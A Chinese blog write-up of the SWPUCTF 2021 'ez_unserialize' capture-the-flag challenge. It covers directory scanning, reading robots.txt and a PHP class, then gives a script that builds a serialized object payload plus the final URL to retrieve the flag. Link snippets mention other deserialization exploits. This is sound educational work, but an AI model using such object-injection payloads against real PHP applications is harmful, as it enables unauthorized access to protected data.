NSSCTF | [SWPUCTF 2021 新生赛]ez_unserialize

最新推荐文章于 2024-06-17 10:49:46 发布
最新推荐文章于 2024-06-17 10:49:46 发布
阅读量833 收藏 11
点赞数 13
文章标签: php 安全 网络 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2302_80946742/article/details/138891534
版权

打开题目,发现是一个GIF动图页面,什么都没有。我们来查看一下源代码,看看有没有什么发现

其实只要足够了解网站的构成,看到绿色的注释字样就能知道它这里在提示robots.txt文件。

但是对于小白来说,也不知道它是什么,那我们最简单粗暴地方式就是来扫一扫这个网站看看有没有别的页面。这里使用的扫描工具是dirsearch目录扫描工具。

python dirsearch.py -u http://node4.anna.nssctf.cn:28286/

可以看到扫描出来的robots.txt文件。 robots.txt 是一个放置在网站根目录下的文本文件,它用于指导网络爬虫(如搜索引擎的机器人)哪些页面可以抓取,哪些页面不应该被访问。通过这个文件,网站管理员可以控制爬虫的行为,保护网站的某些内容不被索引,同时也有助于管理网站的流量和服务器负载。它是任何人都可以访问的文件,只要存在。

我们来查看一下这个网站的robots.txt

可以看到网站还有一个文件cl45s.php,我们来访问一下

可以看到一个php脚本,简单分析一下

这个脚本是用PHP编写的,可能属于一个简单的网站或网络应用的一部分,用于演示如何通过PHP对象的序列化和反序列化来触发特定的行为。下面是对脚本各部分的解释:

1. `error_reporting(0);`:这行代码关闭了PHP的错误报告,这意味着即使脚本中存在错误,也不会显示任何错误信息。

2. `show_source("cl45s.php");`:这行代码显示文件 "cl45s.php" 的源代码。`show_source` 是 `highlight_file` 函数的同义词,用于高亮显示指定文件的源码。

3. 接下来定义了一个名为 `wllm` 的类,包含两个公开属性 `admin` 和 `passwd`,以及一个构造方法和一个析构方法:
   - 构造方法 `__construct()`:这是一个魔术方法,当一个新的 `wllm` 对象被创建时,会自动调用此方法。它将 `admin` 初始化为字符串 "user",将 `passwd` 初始化为 "123456"。
   - 析构方法 `__destruct()`:这是另一个魔术方法,当 `wllm` 对象被销毁时,会自动调用此方法。如果 `admin` 属性等于 "admin" 且 `passwd` 属性等于 "ctf",脚本会包含 "flag.php" 文件,并显示其 `$flag` 变量的内容。否则,会输出 `admin` 和 `passwd` 属性的值和字符串 "Just a bit more!"。

4. `$p = $_GET['p']; unserialize($p);`:这两行代码从URL参数 `p` 中获取一个字符串,并尝试将其反序列化为一个 `wllm` 对象。由于在PHP中对象的反序列化会自动调用对象的析构方法(如果脚本生命周期结束或对象不再被引用时),这可能是一个对象注入漏洞的示例。

这个脚本涉及到的关键安全概念是反序列化漏洞,攻击者可以通过精心构造的序列化字符串来操纵对象的状态,从而可能触发未授权的代码执行。在这个例子中,攻击者可能会尝试提供一个序列化的 `wllm` 对象,其 `admin` 和 `passwd` 属性被设置成了 "admin" 和 "ctf",以此来获取 "flag.php" 中的敏感信息。

编写一个反序列化脚本来解决这个问题

<?php

class wllm {
    public $admin;
    public $passwd;

    public function __construct($admin, $passwd) {
        $this->admin = $admin;
        $this->passwd = $passwd;
    }
}

// 创建一个wllm类的对象,设置admin为admin,passwd为ctf
$obj = new wllm("admin", "ctf");

// 序列化对象
$serialized_obj = serialize($obj);

// 输出序列化后的字符串,可以通过GET参数p传递给原脚本
echo "http://node4.anna.nssctf.cn:28516/cl45s.php/?p=" . urlencode($serialized_obj);

?>

在线运行这个脚本

在线运行PHP

访问运行结果中的地址就可以得到flag

http://node4.anna.nssctf.cn:28516/cl45s.php/?p=O%3A4%3A%22wllm%22%3A2%3A%7Bs%3A5%3A%22admin%22%3Bs%3A5%3A%22admin%22%3Bs%3A6%3A%22passwd%22%3Bs%3A3%3A%22ctf%22%3B%7D

本题完。

Hackerdallas
关注
  • 13
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
NSSCTF】刷题记录——[SWPUCTF 2021 新生]系列(WEB篇)
jameshuangchuan的博客
08-08 2657
此处主要在NSSCTF平台()上开展刷题。
weblogic_unserialize_exploit:Java反序列化vul以进行weblogic利用
04-30
weblogic unserialize exploitjava反序列化漏洞(CVE-2015-4852)的weblogic exploit命令回显exp1.依赖组件python 2.7java2. 程序说明exploit方法来源于Freebuf的”Java反序列化漏洞之weblogic本地利用实现篇”,...
[SWPUCTF 2021 新生] ez_unserialize
Welcome To Myon'Blog !
07-05 1797
链尾(就是最终我们想要利用的地方),在echo $flag 并且include了flag.php 往上看,发现只需要满足 再往上看,发现执行这条语句我们需要触发__destruct()函数 __destruct是析构函数,会在对象的所有引用被删除或者当对象被显式销毁时自动执行,比如new完一个对象,当创建完成之后就不引用了,如果有赋值指向就会立马丢弃,触发destruct函数。 这里还有一个__construct()构造函数,它是在实例化一个对象(即new时)会自动调用。
[NSSCTF]-Web:[SWPUCTF 2021 新生]ez_unserialize解析(反序列化修改属性)
2301_79326813的博客
02-28 345
查看网页这里可以查看robots.txt题目文件如下。
NSSCTF题库[SWPUCTF 2021 新生]+部分新生签到题
热门推荐
J1ng_Hong的博客
10-27 1万+
发现题目需要我们用php伪协议,并且需要前三位是php三个字母。此时我们上网搜索,发现了php://filter可以读取文件。在后面加上write=string.rot13/resource=flag即可。首先一进来就是源码代码审计,非常简单的绕过。其中string.rot13为字符串过滤器。
NSSCTF刷题笔记web10——[SWPUCTF 2021 新生]ez_unserialize
qq_45692883的博客
01-18 492
进行代码审计,也是非常非常的简单,只需要构造一个序列化后的字符串,然后替换其中的数据即可。复制上面类的php代码,替换其中的用户名以及密码进行序列化,执行即可得到payload。源代码提示了这一串数据,是robots.txt的格式。上来问我题目在哪,一般都是直接先看源代码。直接访问robots.txt。
[SWPUCTF] 2021新生之(NSSCTF)刷题记录 ①
Aluxian_的博客
04-17 1768
[SWPUCTF] 2021新生之(NSSCTF)刷题记录wp
[SWPUCTF 2021 新生]ez_unserialize
2301_80156923的博客
12-17 44
发现Disallow 说明跟robots有关,打开。发现一个php,继续查看该php。根据代码构造payload,传参。
[SWPUCTF 2022 新生]1z_unserialize和[SWPUCTF 2022 新生]ez_1zpo
m0_73700261的博客
04-26 799
得到以下payload=O:3:"lyh":3:{s:3:"url";s:3:"lly";以及这里有个wakeup的绕过,以及这里需要一个assert的函数不知道为啥要它,以及里边有一个md5的弱比较,绕过这三个就能够正常的命令执行了。[SWPUCTF 2022 新生]1z_unserialize。接着在另外给自己传参一个参数,在这个参数里做命令执行。[SWPUCTF 2022 新生]ez_1zpo。这个题目是一题很标准的反序列化,在根目录下边找到flag的文件。这个是构造的pop链。
[SWPUCTF 2021 新生] - web
qq_44640313的博客
01-30 1048
[SWPUCTF 2021 新生] web方向的wp,有一个phar反序列化的题做不动了
php中magic_quotes_gpc对unserialize的影响分析
10-25
主要介绍了php中magic_quotes_gpc对unserialize的影响,以实例的形式分析了magic_quotes_gpc安全过滤对unserialize造成的影响以及对此的解决方法,非常具有实用价值,需要的朋友可以参考下
信息安全_数据安全_9_ZN2018_WV_-_PHP_unserialize.pdf
08-21
首先,我们来看`unserialize`的基本用法。它接受一个字符串参数,该字符串是对象或数组等数据类型的序列化表示。例如,序列化的数组`array("foo", "bar")`会转换为`a:2:{i:0;s:3:"foo";i:1;s:3:"bar";}`,而序列化的...
PHP中json_encode、json_decode与serializeunserialize的性能测试分析
10-29
今天偶然在想,如果用PHP写一个类似BDB的基于文件的Key-Value小型数据库用于存储非结构化的记录型数据,不知道效率会如何?
深入解析PHP函数
最新发布
NatLindsay的博客
06-17 389
PHP函数是一种重要的编程概念,它可以帮助开发者组织和管理代码,提高代码的可重用性和可维护性。在PHP中,函数可以完成各种任务,从简单的数学计算到复杂的数据库查询和数据处理。本文将从多个角度探讨PHP函数的应用,涵盖了函数的定义和调用、内置函数的使用、自定义函数的创建以及常见的函数库。函数的参数:函数可以接受零个或多个参数,用于传递数据给函数内部使用。函数可以带有参数,用于接收输入,也可以返回值。函数命名:选择一个有意义的函数名,以便描述函数的功能。函数体:编写函数的具体实现代码,实现特定的功能。
ImageNet-1k 测试集 两大坑
weixin_42815846的博客
06-16 287
不然就会浪费一次提交机会,直接提交submission.txt就可以,注意每排5个预测结果,用于计算top5 error。2、用torchvision自带的imagenet dataset类加载进来的数据的类别标签,)但torchvision自动给你弄成。1、官方网站提交test set标签时,,但是他们的类别id不一样!以chickadee 山雀为例。这是torchvision的。他们的WNID都一样,
1. NAS和SAN存储
u010198709的博客
06-13 542
流程:存储端共享裸块设备,客户端连接存储映射出sdx的虚拟硬盘,客户端分区格式化挂载使用。IQN名称格式: iqn.yyyy-mm.反域名:自定义名称。用户名:openfiler, 密码:password。磁盘接口:SATA,SAS、NVME。支持nfs、cifs协议共享存储空间。nfs:适用于Linux、Unix。类型:IP SAN、FC SAN。cifs:适用于Windows。磁盘类型:机械硬盘、SSD。基于文件系统级别的共享。DAS 直接附加存储。NAS 网络附加存储。SAN 存储区域网络
教育培训系统(FastAdmin+ThinkPHP+Unipp)
2401_84413757的博客
06-17 438
教育培训系统是一个集在线课程、学习资源、互动交流等功能于一体的综合性学习平台。它打破了传统教育的时空限制,让学习变得更加灵活自由。学员们可以根据自己的时间和需求,随时随地访问系统,选择感兴趣的课程进行学习。教育培训系统以其便捷的学习方式、丰富的资源和智能的评估功能,为我们的学习之路增添了色彩。让我们一起拥抱这个全新的学习平台,让学习变得更简单、更有趣!
源码编译安装LAMP
潇的博客
06-12 926
LAMP 架构是目前成熟的企业网站应用模式之一,指的是协同工作的一整套系统和相关软件,能够提供动态Web站点服务及其应用开发环境。LAMP是一个缩写词,具体包括Linux操作系统、Apache网站服务器、MySQL数据库服务器、PHP(或Perl、Python)网页编程语言。本章将以源码编译的方式搭建LAMP环境,能够满足企业定制化的需求。在构建LAMP平台时,各组件的安装顺序依次为Linux、Apache、MySQL、PHP。其中Apache和MySQL的安装并没有严格的顺序;
攻防世界web_php_unserialize
06-28
攻防世界web_php_unserialize是一个关于PHP反序列化漏洞的题目,需要掌握PHP反序列化漏洞的原理和利用方法。在这个题目中,可能会给出一个序列化的字符串,需要将其反序列化并进行一些操作,最终达到获取flag的目的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值